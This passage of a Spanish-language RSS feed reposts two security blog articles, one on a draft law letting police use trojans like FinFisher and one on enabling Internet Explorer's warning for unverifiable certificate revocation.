class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/presentamos-tike.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-5510048580987483595</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:21.332-05:00</atom:updated><title>Los troyanos policiales del borrador de la nueva ley</title><description>&lt;a href="http://feedproxy.google.com/~r/ElLadoDelMal/~3/w2BwBmvbq6o/los-troyanos-policiales-del-borrador-de.html"&gt;Los troyanos policiales del borrador de la nueva ley&lt;/a&gt;: &lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El revuelo ayer fue sin duda el debate de la noticia de que el &lt;i&gt;&lt;b&gt;Ministro de Justicia&lt;/b&gt;&lt;/i&gt; está pensando en &amp;nbsp;una &lt;a href="http://sociedad.elpais.com/sociedad/2013/06/03/actualidad/1370289646_865495.html"&gt;ley que permita a los cuerpos de seguridad del estado utilizar troyanos&lt;/a&gt; para infectar los equipos, &lt;i&gt;&lt;b&gt;smartphones&lt;/b&gt;&lt;/i&gt; y &lt;i&gt;&lt;b&gt;tablets&lt;/b&gt;&lt;/i&gt; de criminales de "presuntos" criminales. Este texto daría cobertura legal al uso de sistemas como &lt;a href="http://www.elladodelmal.com/2013/03/paneles-de-control-de-finfisher.html"&gt;FinFisher&lt;/a&gt; o &lt;a href="http://www.hackingteam.it/"&gt;HackingTeam&lt;/a&gt; que ya utilizan otros países como &lt;i&gt;&lt;b&gt;Alemania&lt;/b&gt;&lt;/i&gt; donde su uso es legal.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-sRG8xHUoPMI/Ua7YGPMWUjI/AAAAAAAAQR4/86bHkthHwl4/s1600/FinFisher_Europa.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-sRG8xHUoPMI/Ua7YGPMWUjI/AAAAAAAAQR4/86bHkthHwl4/s1600/FinFisher_Europa.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 1: Países en Europa donde se han detectado paneles de control de FinFisher&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Los problemas técnicos de la investigación policial&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El proceso actual sigue estando basado en detectar la dirección &lt;i&gt;&lt;b&gt;IP&lt;/b&gt;&lt;/i&gt; desde la que se está realizando el delito, localizar la persona detrás de esa dirección &lt;i&gt;&lt;b&gt;IP&lt;/b&gt;&lt;/i&gt;, solicitar una orden judicial e incautar el equipo. Una vez obtenido el equipo, comenzar un estricto proceso de custodia de evidencias y basar todo en un análisis forense de los datos que se obtienen del terminal. Esto tiene muchos problemas técnicos en todas las fases, que todos conocemos:&lt;/div&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;- &lt;b&gt;Investigar una dirección IP no siempre es fácil&lt;/b&gt;: &lt;i&gt;En España hay una ley de secreto de las comunicaciones que evita que se pueda analizar mucho tráfico de red generado por una dirección IP, lo que dificulta mucho la investigación para detectar los actos delictivos.&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;- &lt;b&gt;Las direcciones IP no tienen siempre que apuntar a una persona&lt;/b&gt;: &lt;i&gt;Los criminales especializados en Internet se lo tienen bien aprendido esto, por eso utilizan conexiones desde direcciones IP de otros países, uso de proxies anónimos - como ya vimos en el caso de &lt;a href="http://www.elladodelmal.com/2012/03/owning-bad-guys-mafia-with-javascript.html"&gt;Owning Bad Guys {and mafia} using JavaScript Botnets&lt;/a&gt; -, redes TOR, o simplemente una &lt;a href="http://www.elladodelmal.com/2013/01/wifi-ajena-no-es-siempre-wifi-segura-ni.html"&gt;red WiFi temporal o de otra persona&lt;/a&gt;.&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;- &lt;b&gt;El cifrado de los datos&lt;/b&gt;: &lt;i&gt;Si el equipo tiene TrueCrypt, FileVault, PGP o BitLocker, &lt;a href="http://www.elladodelmal.com/2012/09/no-lusers-147-crackear-volumenes.html"&gt;hay que pasar por un proceso previo de crackeo&lt;/a&gt; para luego hacer el análisis forense. Esto no siempre es fácil ni posible. Por ejemplo, un terminal iPhone 4S o iPhone 5 con un passcode complejo, del que el sospechoso se hubiera negado a proporcionar la clave y que hubiera sido apagado antes de ser interceptado, no podría ser analizado al no existir ninguna forma de extraer datos sin tener un equipo pareado o las copias de Apple iCloud.&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Con el uso de troyanos como &lt;a href="http://www.seguridadapple.com/2012/10/finspy-para-ios-troyanos-del-gobierno.html"&gt;FinSpy&lt;/a&gt; o &lt;a href="http://www.hackingteam.it/images/stories/RCS2012.pdf"&gt;Hacking Team&lt;/a&gt; para infectar &lt;i&gt;&lt;b&gt;smartphones&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;tablets&lt;/b&gt;&lt;/i&gt;, lo que se busca es resolver este problema de raíz desde las redes del país, lo que daría a los cuerpos de seguridad la capacidad de acabar estos problemas de forma más definitiva.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-VBhYmuOvDAU/Ua7X0Xaj5qI/AAAAAAAAQRw/Q47ynJQ1OiM/s1600/HackingTeam.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-VBhYmuOvDAU/Ua7X0Xaj5qI/AAAAAAAAQRw/Q47ynJQ1OiM/s1600/HackingTeam.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 2: Publicidad de Remote Control System de Hacking Team&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para ello, también sería necesario contar además con una inversión en &lt;i&gt;&lt;b&gt;exploits&lt;/b&gt;&lt;/i&gt; - además de trucos de habituales de ingeniería social - y con técnicas de mutación del troyano para evitar la detección de los mismos por medio de los &lt;i&gt;&lt;b&gt;antimalware&lt;/b&gt;&lt;/i&gt;. Problemas técnicos habituales que se resuelven con normalidad para hacer que estos ataques y estos troyanos no sean tan facilmente detectables como dicen algunos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;El auténtico debate no es técnico&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La pregunta, por tanto, deja de ser técnica y recae más en un debate legal o ético para ver si estas medidas están acorde con lo que los ciudadanos de este país queremos o no queremos. Según el texto del borrador, se podría utilizar en delitos con condenas de penadas con más de 3 años, donde caen cosas tan severas como la &lt;i&gt;&lt;b&gt;pederastia&lt;/b&gt;&lt;/i&gt; o cosas como la piratería de música - bajo debate público largo tiempo -, lo que hace que se nos emborrone el debate sobre el uso que se puede dar a estas herramientas.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Por supuesto, el miedo de muchos es que con estos troyanos - como ya sucedió antes con la proliferación de las cámaras de seguridad que graban a los ciudadanos por las calles hace años, o la puesta en marcha del sistema de interceptación &lt;i&gt;&lt;b&gt;legal&lt;/b&gt;&lt;/i&gt; de las tele comunicaciones &lt;a href="http://es.wikipedia.org/wiki/SITEL"&gt;SITEL&lt;/a&gt; - caiga en malas manos, y acabe siendo nuestro país un estado totalitarista enemigo de Internet y de sus ciudadanos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://www.boe.es/boe/dias/2007/10/25/pdfs/B12614-12614.pdf" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-AbRtINRDDS8/Ua7cYG-kjeI/AAAAAAAAQSI/QfT6zoUfSAM/s1600/Resolucio%CC%81n_SITEL.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 3: Resolución SITEL en el BOE. Año 2007.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Bajo mi punto de vista, si esto está controlado por la justicia, y hay un control férreo de estos sistemas de seguridad - y entre estos sistemas de seguridad incluyo las armas de fuego que se les dan a las personas que velan por nuestra seguridad, las cámaras de vigilancia que se ponen en las ciudades, los sistemas de comunicaciones como &lt;i&gt;&lt;b&gt;SITEL&lt;/b&gt;&lt;/i&gt; o estos nuevos troyanos - y se usan para que los malos no se vayan de rositas, creo que estaría bien dotar a nuestros protectores de todas las herramientas técnicas posibles y que no estén en inferioridad técnica frente a los delincuentes, que alguna vez viven con total impunidad.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Solo para que veáis con qué impunidad se sienten algunos, aquí os dejo una conversación que puede &lt;a href="http://www.elladodelmal.com/2013/02/buscar-en-la-deep-web-usando-onionto-y.html"&gt;encontrarse en la Deep Web&lt;/a&gt; sin tener que hacer muchas piruetas. He tapado la foto para que sea lo menos dañino posible, porque creo que con los mensajes es suficiente para que os hagáis una idea.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Jk7RYNqupGY/Ua7LJhj4rpI/AAAAAAAAQRg/x5GgTxFgP1M/s1600/Censored_.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-Jk7RYNqupGY/Ua7LJhj4rpI/AAAAAAAAQRg/x5GgTxFgP1M/s1600/Censored_.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 4: Uno de tantos en la Deep Web. Algunos ponen hasta sus correos públicos.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Creo que lo que deberíamos conocer es &lt;i&gt;&lt;b&gt;&lt;u&gt;más información sobre los controles que se harían&lt;/u&gt;&lt;/b&gt;&lt;/i&gt;&amp;nbsp;de este tipo de tecnologías y &lt;u&gt;&lt;i&gt;&lt;b&gt;limitar mejor su uso y aplicación&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;, para que esto no sea algo arbitrario a cualquier ciudadano.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://elladodelmal.com/"&gt;Un informático en el lado del mal&lt;/a&gt; - &lt;a href="https://plus.google.com/102683520044497994270/posts"&gt;Google+&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/ElLadoDelMal"&gt;RSS&lt;/a&gt; &lt;a href="http://www.informatica64.com/"&gt;Informática 64&lt;/a&gt; &lt;a href="http://seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt;&lt;br /&gt;&lt;a href="http://0xword.com/"&gt;&lt;img src="http://1.bp.blogspot.com/-JhYS6t42nko/UJT-CLSNlpI/AAAAAAAANto/B41xfheH_xo/s1600/L1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=w2BwBmvbq6o:IvdxUkYSkqg:yIl2AUoC8zA"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=yIl2AUoC8zA" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=w2BwBmvbq6o:IvdxUkYSkqg:-BTjWOF_DHI"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?i=w2BwBmvbq6o:IvdxUkYSkqg:-BTjWOF_DHI" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=w2BwBmvbq6o:IvdxUkYSkqg:qj6IDK7rITs"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=qj6IDK7rITs" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=w2BwBmvbq6o:IvdxUkYSkqg:7Q72WNTAKBA"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=7Q72WNTAKBA" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=w2BwBmvbq6o:IvdxUkYSkqg:I9og5sOYxJI"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=I9og5sOYxJI" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=w2BwBmvbq6o:IvdxUkYSkqg:ecdYMiMMAMM"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=ecdYMiMMAMM" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/w2BwBmvbq6o" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/los-troyanos-policiales-del-borrador-de.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://4.bp.blogspot.com/-sRG8xHUoPMI/Ua7YGPMWUjI/AAAAAAAAQR4/86bHkthHwl4/s72-c/FinFisher_Europa.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-8021543474522383307</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:15.861-05:00</atom:updated><title>Habilitar aviso de certificado no verificable en Internet Explorer</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityByDefault/~3/90kyNvjCoPo/habilitar-aviso-de-certificado-no.html"&gt;Habilitar aviso de certificado no verificable en Internet Explorer&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-rDMJfsP8OTE/UaecK-XVfrI/AAAAAAAAADY/y6DVJ5eN4jY/s1600/ie.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="154" src="http://3.bp.blogspot.com/-rDMJfsP8OTE/UaecK-XVfrI/AAAAAAAAADY/y6DVJ5eN4jY/s200/ie.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En anteriores artículos, nuestro compañero Yago publicó una entrada muy interesante titulada &lt;a href="http://www.securitybydefault.com/2013/05/certificados-ssl-irrevocables.html"&gt;Certificados SSL irrevocables&lt;/a&gt;. En esta entrada se debatía la gestión de certificados digitales, en especial la parte designada a la revocación de los mismos y cómo se comporta en este tipo de situaciones un navegador específico. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para ello, en el artículo se plantea esta gestión desde el punto de vista del que emite un certificado (Entidad Certificadora) como del receptor del mismo (Por ejemplo un navegador a través de un sistema operativo). &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Como bien se comenta en el artículo, para comprobar si un certificado es válido, existen dos mecanismos para realizarlo. O bien por listas de revocación (CRL) o a través de servicios en tiempo real como OCSP. Y aquí es donde empiezan los problemas. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Existe tanta controversia en la implementación y veracidad de estos mecanismos, que cada navegador implementa este chequeo en mayor o menor medida. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para los más paranoicos existe el problema de la privacidad, ya que&amp;nbsp;si un cliente (Un navegador por ejemplo) realiza una petición a una de estas CA para determinar si un certificado es válido o no, por el mecanismo que sea (OCSP o CRL), la CA bien podría estar almacenando las direcciones IP de quien se conecta, y a qué dirección URL está accediendo. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Otro problema bien podría ser el de la disponibilidad. Muchos navegadores realizan peticiones a una CA antes de aceptar un certificado. Esto, que en principio podría ser una buena práctica, se puede convertir en un punto de fallo para la empresa (Emisor de certificados) que disponga el servicio, pudiendo ocasionar picos elevados de consultas, con la consiguiente disminución del servicio. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El tiempo es un factor importante en el caso de que se opte por el mecanismo OCSP. Por defecto, el tiempo de espera entre una petición cliente-servicio OCSP se encuentra en torno a los 15 segundos. Si a una petición de este tipo se le aplican las velocidades de otros países, latencias en la red, caídas del servicio y una infinidad de posibles problemas de conexión, tendremos un bonito navegador que no sabrá qué hacer ante un imprevisto de esta índole. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Y la última que se me ocurre, y no menos importante, es cuando se realiza un ataque.&amp;nbsp; Hace ya tiempo, Moxie Marlinspike implementó en su archiconocida herramienta &lt;a href="http://www.blackhat.com/presentations/bh-usa-09/MARLINSPIKE/BHUSA09-Marlinspike-DefeatSSL-SLIDES.pdf"&gt;sslstrip&lt;/a&gt; un ataque contra OCSP conocido como &lt;a href="http://www.thoughtcrime.org/papers/ocsp-attack.pdf"&gt;el ataque del 3&lt;/a&gt;, el cual ya Chema Alonso &lt;a href="http://www.elladodelmal.com/2011/03/ocsp-el-update-de-windows-raul-y-el.html"&gt;anotó en su blog&lt;/a&gt;. A grandes rasgos, y en un ataque de tipo Man in The Middle, este ataque tenía éxito ya que enviaba a toda petición de tipo OCSP una respuesta indicando un mensaje de inténtelo más tarde (TryLater), ya que a estos campos no se le aplica la firma digital. No hay comprobación, no hay alerta. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Gracias a estos posibles problemas que una persona se puede encontrar en su día a día, los equipos de desarrollo implementan en los navegadores aquellos mecanismos de verificación que tengan un menor impacto en el usuario final, en cuanto a experiencia de usuario. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Con todo esto que hemos comentado en anteriores párrafos, me quedo con un comentario en ese mismo &lt;a href="http://www.securitybydefault.com/2013/05/certificados-ssl-irrevocables.html"&gt;artículo&lt;/a&gt; escrito por exoddus, en el que cita que porque una CA no publique sus mecanismos de revocación para el cliente, eso no quiere decir que los certificados no se puedan revocar. Pero también me quedo con el mensaje de Yago. ¿Y los usuarios qué? ¿Qué mecanismos tiene el navegador o el sistema operativo para alertarnos cuando algo de esto pasa? ¿O es que tenemos que mirar las propiedades y extensiones de todo certificado digital?&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;A partir de Windows Vista y a través de políticas de grupo, es posible definir, configurar y optimizar el comportamiento del sistema a la hora de realizar este tipo de comprobaciones a nivel corporativo. &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;A nivel de usuario, si por ejemplo accedemos a la URL que indicó Yago (&lt;a href="https://sede.malaga.es/"&gt;https://sede.malaga.es&lt;/a&gt;) a través de Internet Explorer, nos encontraremos con una imagen similar a la siguiente:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-e1aOzAOv8P8/UaeZif59PEI/AAAAAAAAAC4/DyQZXPVElzk/s1600/1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="155" src="http://3.bp.blogspot.com/-e1aOzAOv8P8/UaeZif59PEI/AAAAAAAAAC4/DyQZXPVElzk/s640/1.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;Imagen 1.- Internet Explorer sin alertas aparentes con certificado no-verificable&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Como bien se comentaba en el artículo anterior, a partir de Windows Vista se realizan las comprobaciones a través de los dos mecanismos citados anteriormente, pero con el consiguiente de que si no obtiene respuesta de ninguno de ellos (Sea por la causa que sea), el navegador no mostrará ningún tipo de alerta. &lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Este comportamiento es así por diseño del propio Internet Explorer, ya que como hemos citado anteriormente, existen tantas posibilidades de que una petición de verificación no se realice con éxito, que el sólo hecho de incluir una alerta o fallo degradaría en muchos casos la experiencia de un usuario cuando éste navegase por Internet. &lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Esto no quiere decir que el navegador (En el caso de Internet Explorer) no incluya este tipo de aviso o alerta. La incluye, pero hay que activarla, ya que ésta viene desactivada por defecto.&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;La activación de esta característica es una tarea trivial, y sólo hace falta una pequeña modificación del registro para que puedan disfrutar de ella aquellos usuarios que así lo deseen. &lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En el caso de que se desee&amp;nbsp;configurar para un usuario en particular la recomendación es&amp;nbsp;aplicar este cambio en la clave HKEY_CURRENT_USER (Perfil de usuario autenticado en la máquina).&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-WQOufIQ19Jk/UaeZiqzf9tI/AAAAAAAAAC0/5nASOWhCVMc/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="196" src="http://2.bp.blogspot.com/-WQOufIQ19Jk/UaeZiqzf9tI/AAAAAAAAAC0/5nASOWhCVMc/s640/3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;Imagen 3.- Configuración de parámetro FEATURE_WARN_ON_SEC_CERT_REV_FAILED para avisos de fallo de chequeo&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Si se desea&amp;nbsp;aplicar este cambio a nivel de equipo, se puede realizar a través de la clave HKEY_LOCAL_MACHINE. Este cambio afectará a todos los usuarios que utilicen el sistema.&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;Una vez habilitada esta característica, y si volvemos a encontrarnos con un fallo de chequeo a nivel de revocación, el navegador Internet Explorer nos mostrará una alerta del siguiente tipo:&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-htKTnCA3Ygs/UaeZjW_IWhI/AAAAAAAAADE/-scLioWpV5w/s1600/4.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="217" src="http://4.bp.blogspot.com/-htKTnCA3Ygs/UaeZjW_IWhI/AAAAAAAAADE/-scLioWpV5w/s640/4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;Imagen 4.- Activación de característica de alerta de certificado no-verificable&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Un saludo a tod@s!&lt;/div&gt;&lt;br 